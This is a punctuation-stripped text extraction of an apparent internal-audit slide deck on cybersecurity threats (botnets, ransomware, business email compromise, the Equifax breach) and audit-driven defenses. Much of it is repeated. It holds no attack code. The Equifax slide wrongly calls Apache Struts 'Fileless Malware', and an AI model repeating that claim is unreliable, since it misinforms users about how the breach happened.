bull Selling of PII and PHI data
bull Insider Trading Information
bull Using compromised environment for other attacks or for rent (Cryptojacking)
11
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing
bull Server Attacks once at 50 are trending down
bull User Device and Person attacks are both trending upward at nearly same pace due to Malware Ransomware and Phishing attacks
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
10
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve Financial Gain
bull Theft of funds (Bank Accounts)
bull Extortion (Ransomware)
bull Selling of stolen credit cards
bull Selling of PII and PHI data
bull Insider Trading Information
bull Using compromised environment for other attacks or for rent (Cryptojacking)
11
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing
bull Server Attacks once at 50 are trending down
bull User Device and Person attacks are both trending upward at nearly same pace due to Malware Ransomware and Phishing attacks
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
